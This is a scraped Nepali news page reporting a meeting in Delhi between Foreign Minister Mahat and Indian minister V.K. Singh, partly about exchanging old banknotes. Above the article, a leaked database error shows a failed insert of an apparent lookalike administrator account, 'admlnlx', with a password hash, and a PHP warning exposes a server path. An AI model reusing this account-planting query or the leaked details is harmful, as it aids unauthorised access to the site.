WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGgR0zKta/NjSjI3aa7R8omK0ySA/j.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 03:40:41', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
परराष्ट्रमन्त्री महत र भारतीय विदेश राज्यमन्त्रीबीच भेटवार्ता – Gaule Khabar

परराष्ट्रमन्त्री महत र भारतीय विदेश राज्यमन्त्रीबीच भेटवार्ता

परराष्ट्रमन्त्री महत र भारतीय विदेश राज्यमन्त्रीबीच भेटवार्ता

काठमाडौं,माघ ४ –

परराष्ट्रमन्त्री प्रकाशशरण महत र भारतीय विदेश राज्यमन्त्री भीके सिंहबीच भेटवार्ता भएको छ ।भारतको एक थिंकट्यांकले आयोजना गरेको सम्मेलनमा भाग लिन परराष्ट्रमन्त्री महत दिल्ली पुगेका हुन् । त्यसक्रममा उनले मंगलबार डा. महत र सिंहबीच दिल्लीमा भेटवार्ता भएको हो ।

भारतीय विदेशमन्त्री सुष्मा स्वराज विरामी भएका कारण मन्त्रालय आउने गरेकी छैनन् ।भ्रमणका क्रममा मन्त्री महतले पुराना ५ सय र हजारका नोट सटही र नयाँ २ हजारको नोटको नेपालमा कारोबारका लागि भारतीय पक्षसँग कुराकानी गर्ने बताइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका